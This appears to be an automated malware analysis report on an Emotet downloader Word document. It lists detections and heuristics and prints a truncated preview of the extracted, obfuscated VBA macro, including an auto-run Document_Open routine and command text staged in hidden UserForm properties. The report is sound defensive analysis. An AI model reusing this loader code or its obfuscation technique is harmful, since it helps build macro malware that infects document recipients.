Verdict: MALICIOUS
Risk Score: 262

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains VBA macros, specifically a Document_Open macro that uses CreateObject, which is indicative of a downloader. ClamAV explicitly names the file 'Doc.Downloader.Emotet-7464372-0'. The macro is obfuscated and stages its command text in hidden UserForm properties, which suggests a sophisticated downloader designed to execute a second-stage payload.
Heuristics (7)

- ClamAV: Doc.Downloader.Emotet-7464372-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7464372-0
- VBA macros detected (medium, 4 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager (critical, OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10697 bytes | 46bc66e7944768f389fb49a211b7889dfddf333fea30766c468c11f7e6f20d48 |

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Cfifdbzh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Txqcvasu, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Jirqxvrcjakzc
Case Dhgzjyzqjcpm
Oyrcksll = Sin(Hhoupuixdsloy)
Aksioijycvctx = CStr(Kriksbjf)
Trjzoazlcji = 324
Knxjmzma = Sin(Yitfnmxre)
Uqaynuciuivr = CStr(Wuswgnoilkrvu)
Esdbjqwxkzeks = 567
Dqehrsfuydflf = Sin(Raqipprqf)
Whwbdvso = CStr(Rmvgzyfx)
Rheieujai = 5645
End Select
For Yarvxxxaktrjf = Vcqqmtcciod To Jlrfubslelcai
While Layyiryhkrag <> Igtjzryblodhb
Nqewirhqefg = Houvwnvej * Atn(Fvjpjvbph) * (Bvkogaqodtgtu + Iknvmeyvqnhs)
Wend
Next
Select Case Vehtpovkfitu
Case Fhtiknlvszx
Zpuuttwposwh = Sin(Heiqeqrbekhf)
Zmhwjsvvlo = CStr(Fzrowakt)
Jjtpdxkjmntm = 324
Kaygxmsu = Sin(Ksjqnhuf)
Dydtpykbb = CStr(Tjqdwcdvs)
Sqelntwftnh = 567
Lxerzbqsfvrit = Sin(Frjmingmoek)
Wstmbsszx = CStr(Rjxnunduheabd)
Kfkpnokkwmcfg = 5645
End Select
For Rhenvzqtsbbq = Vqprcimo To Hgybasixtnntx
While Ztlsomxbjavmn <> Hczfgoapsase
Nctztcobwumj = Affvtagkurk * Atn(Esrviafvybnub) * (Gfswjlpnu + Wpdhcpjdki)
Wend
Next
Select Case Xutfhjzrc
Case Fxvmwkubs
Hmzcyhinjzpn = Sin(Jdcqrdzqn)
Kpwnatild = CStr(Fekrioviq)
Engrlasuqye = 324
Rmzifgbducx = Sin(Zukvffxvl)
Jiitixhbj = CStr(Wondjilj)
Sfaxkutyxt = 567
Tywyivwv = Sin(Kzywicwojby)
Chvycocmcts = CStr(Gkzqmpmevbz)
Qcijefvhuq = 5645
End Select
For Ugubhfgatwlpt = Kmggwkpxzd To Nzglultsisc
While Snsurtqpvkvnk <> Ejuypptbnk
Zwbsjskd = Cikbarokyjuhn * Atn(Eyfzlfkaprsus) * (Aoohgmonpbmc + Jrjcteued)
Wend
Next
Xgmmntpfabj
End Sub
Attribute VB_Name = "Nvexppvwbclb"
Attribute VB_Base = "0{A6D80BC6-2311-44CA-A76A-75F767D585D2}{366FF9DB-38AE-4D4B-A864-A07D6AC66334}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Uyrkuoeaboav"
Function Wyjpoleontqe()
Select Case Pudafirtriera
Case Ethbtoflgkn
Rcdncrfu = Sin(Uvfwlerxpk)
Ncqpkjiwqrbq = CStr(Erpjovsjmgn)
Hpnywjyobxnh = 324
Ptdupuwzah = Sin(Vzepkbsqagcsf)
Adubcsjd = CStr(Myxwipfsan)
Lmloelirkp = 567
Vvfgddlvogy = Sin(Tsrxaeseqrhq)
Yvyzxpgbmjz = CStr(Cdwfoitltrtkk)
Fdypppnapg = 5645
End Select
For Osfhykhqbum = Ucfefomav To Ljahocgynv
While Njvaczjkrgiu <> Wksontwww
Zcznoemqjr = Ojallreagu * Atn(Wgzhlxrng) * (Wkwdbvde + Ademhkfr)
Wend
Next
Svoeisqwp = Cfifdbzh.Txqcvasu
Select Case Ywnwqvijnirak
Case Ixsdlntodw
Gvwqliwgnveis = Sin(Xamjybve)
Svleikaex = CStr(Qsfsokxnsjl)
Voqmnvkqqk = 324
Kbfkeeuzmh = Sin(Rjryrnvhl)
Ttnqbrxahm = CStr(Jscofrka)
Judemzcpl = 567
Smrqnshoga = Sin(Fifozppbyu)
Snxfyysbes = CStr(Lysydmhfo)
Wgldzvznyygxz = 5645
End Select
For Qiithmrz = Xqxlmhvk To Znutfefr
While Asdbvzxvb <> Ghccecbmr
Lucdnpochas = Envqnkai * Atn(Sfsqacdfptnhi) * (Lhhzdenibxrg + Hkehzjyvynzdv)
Wend
Next
Twyotyzlmuu = Svoeisqwp + Nvexppvwbclb.Kdxtincasrpzy + Nvexppvwbclb.Fhwefplfn + Nvexppvwbclb.Ejngnmrbmmuof
Select Case Rcmsldowoup
Case Fqejjmrliy
Doirgesgqe = Sin(Lbolnkoemqmf)
Apybidcjhpff = CStr(Xauaxmyixgy)
Fwmbdkkech = 324
Qqctzgibyglwm = Sin(Xrssdkswmuoc)
Lvtfehvwpyzpw = CStr(Kqpvpnnkollyt)
Lendnlsqhbzac = 567
Oogxbeygfkxk = Sin(Sibgqnvbsyns)
Uqmlqvxxs = CStr(Umxitpanxos)
Lgxmvhjjeqmp = 5645
End Select
For Ujvvqerway = Inectcsszkylb To Fqwksvdgebs
While Cpfzswyvebxk <> Nkkkufrmg
Bdfhzbaazpk = Tfmraozavqpvu * Atn(Vbqjblqtsofaw) * (Pcflrptzlremf + Lfkbfyzbdnc)
Wend
... (truncated)